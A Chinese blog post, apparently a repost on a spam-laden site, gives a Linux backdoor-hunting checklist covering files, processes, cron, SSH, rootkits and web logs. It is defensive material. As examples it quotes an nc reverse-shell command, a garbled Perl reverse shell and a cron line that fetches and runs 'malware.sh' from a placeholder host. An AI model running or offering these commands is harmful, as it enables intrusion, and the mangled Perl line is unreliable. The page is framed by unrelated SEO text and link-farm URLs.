当前位置: 首页 > wzjs >正文

网站建设流程分为三个步骤wordpress手机无法访问

网站建设流程分为三个步骤,wordpress手机无法访问,网站前台空白,佛山网站设计实力乐云seo声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!! 1. 检查异常文件 (1)查找最近修改的文件 # 查…

声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!

1. 检查异常文件

(1)查找最近修改的文件

# 查找最近3天内被修改的文件(重点检查Web目录)
find /var/www/ -type f -mtime -3 -ls | sort -k8

● 重点关注:.php、.jsp、.asp、.sh 等可执行文件。


● 隐藏文件:检查 /tmp/、/dev/shm/ 等临时目录。

(2)查找可疑文件名

# 查找包含常见后门特征的文件名
find / -name "*shell*" -o -name "*backdoor*" -o -name "*b374k*" -o -name "*c99*" -ls

● 常见WebShell:shell.php、b374k.php、c99.php、wso.php。

● 隐藏技巧:攻击者可能使用 …gif.php 伪装成图片。

(3)查找大文件(可能含加密数据)

find / -type f -size +5M -exec ls -lh {} \; | grep -v "log\|cache"

● 异常大文件:可能是攻击者存放的加密数据或恶意代码。

2. 检查异常进程

(1)查看运行中的可疑进程

ps aux | grep -E "(sh|bash|perl|python|nc|ncat|socat|wget|curl|\.\/)"

● 常见后门进程:

● nc -lvp 4444 -e /bin/bash(反弹Shell)

● perl -e 'use Socket; i = " x . x . x . x " ; i="x.x.x.x"; i="x.x.x.x";p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)));open(STDIN,“>&S”);open(STDOUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);

(2)检查隐藏进程

# 查看所有进程(包括无二进制文件的进程)
top -c

● 异常进程:无对应文件、占用高CPU、奇怪命令行参数。

(3)检查网络连接

netstat -antp | grep ESTABLISHED
ss -tulnp

● 可疑外联IP:连接到未知IP的 bash、sh、nc 进程。

3. 检查定时任务

(1)查看用户级定时任务

crontab -l

(2)检查系统级定时任务

ls -la /etc/cron.*
cat /etc/crontab

● 异常任务:如 wget http://x.x.x.x/malware.sh | sh。

4. 检查SSH后门

(1)查看SSH登录记录

cat /var/log/auth.log | grep "Accepted"
cat /var/log/secure | grep "Accepted"  # CentOS

● 异常登录:陌生IP、非工作时间登录。

(2)检查SSH密钥

ls -la ~/.ssh/authorized_keys

● 攻击者可能添加自己的公钥,实现免密登录。

(3)检查SSH配置文件

cat /etc/ssh/sshd_config | grep -E "(PermitRootLogin|AllowUsers|Port)"

● 异常配置:PermitRootLogin yes(应禁用root登录)

5. 检查内核级Rootkit

(1)检查系统调用劫持

strace -p <PID>  # 跟踪进程的系统调用

● 异常行为:如 open(“/etc/shadow”) 或 execve(“/bin/sh”)。

(2)使用专用工具检测

# 安装并运行Rootkit检测工具
sudo apt install rkhunter chkrootkit -y
sudo rkhunter --check
sudo chkrootkit

6. 检查Web日志

(1)查找可疑HTTP请求

cat /var/log/apache2/access.log | grep -E "(cmd=|eval|system|passthru|shell_exec)"

● 常见攻击特征:
○ GET /index.php?cmd=whoami
○ POST /upload.php -F “file=@shell.php”

(2)检查大流量IP

cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -nr | head -n 10

● 高频访问IP:可能是攻击者在扫描或爆破。

7.总结


文章转载自:

http://mSCeipQm.tqqbz.cn
http://wmG8vGVZ.tqqbz.cn
http://GUKnD1Vb.tqqbz.cn
http://BSq8Ypog.tqqbz.cn
http://LfOVoZw4.tqqbz.cn
http://VGioxdVa.tqqbz.cn
http://8L8aTwDm.tqqbz.cn
http://KHtuHBlr.tqqbz.cn
http://FcJUMDkj.tqqbz.cn
http://m2Psh0x6.tqqbz.cn
http://srn0XqkH.tqqbz.cn
http://qeZ0HVdO.tqqbz.cn
http://E9RD9Rw5.tqqbz.cn
http://UsynnBBX.tqqbz.cn
http://srG3T2iZ.tqqbz.cn
http://IxlEQyWC.tqqbz.cn
http://yupbgKob.tqqbz.cn
http://SLCHDPK3.tqqbz.cn
http://c4KYape7.tqqbz.cn
http://rrR3k3ki.tqqbz.cn
http://F0sj2yrn.tqqbz.cn
http://gBrWpaei.tqqbz.cn
http://wqwCe8B2.tqqbz.cn
http://v86NjBho.tqqbz.cn
http://VGHpg8nh.tqqbz.cn
http://af4kGgSv.tqqbz.cn
http://kiLxjgvw.tqqbz.cn
http://flzfIeiz.tqqbz.cn
http://7Yaox0E4.tqqbz.cn
http://qS0H6WzF.tqqbz.cn
http://www.dtcms.com/wzjs/675946.html

相关文章:

  • 公司网站域名过期如何建设一个国外网站
  • 100种增加网站流量的方法企业展厅装修设计
  • 建立网站多少钱wordpress加速优化服务器
  • WordPress影视站源码电子商务网站建设是学什么软件
  • 塘厦仿做网站海南注册公司流程和费用
  • 建立网站的流程多少钱oa办公软件手机版
  • 仲恺企业网站建设项目管理的主要内容包括哪些
  • 宾馆网站建设模板网站和定制网站的优劣势对比
  • 晋江做网站的公司哪家好做调查问卷换赏金的网站
  • 腾讯做的电子商务网站建设六马路小学网站
  • flash如何做网站大淘客 wordpress
  • 行业门户网站建设哪家好数据型网站
  • 旧宫网站建设android开发显示wordpress
  • 17一起做网站童装珠海网站建设 旭洁科技
  • 网站后台怎么打开绵阳阡陌网站建设
  • 响应式网站开发方法浪尖工业设计公司官网
  • 海口手机网站制作工厂网站怎么做
  • 主流门户网站抖音小程序推广怎么挂才有收益
  • 动画网站模块手机测评网站
  • 做电脑网站手机能显示《网页设计与制作》实验报告
  • 买网站做seo网站开发制作计算器
  • 深圳网站建设燦网站建设哪里可以学
  • 花都企业网站建设做网站交付标准
  • 枣庄网站建设电话网页访问禁止怎么恢复
  • 滨州建设网站seo顾问是什么
  • 免费建网站 手机网站建设网站和备案
  • 重庆网站关键词优化推广上海专业网站建设多少钱
  • 网站制作与网页建设网站模板 站长之家
  • 建立自己的网站怎么样做K12网站怎么建设
  • 环保网站策划书wordpress 子目录 .htaccess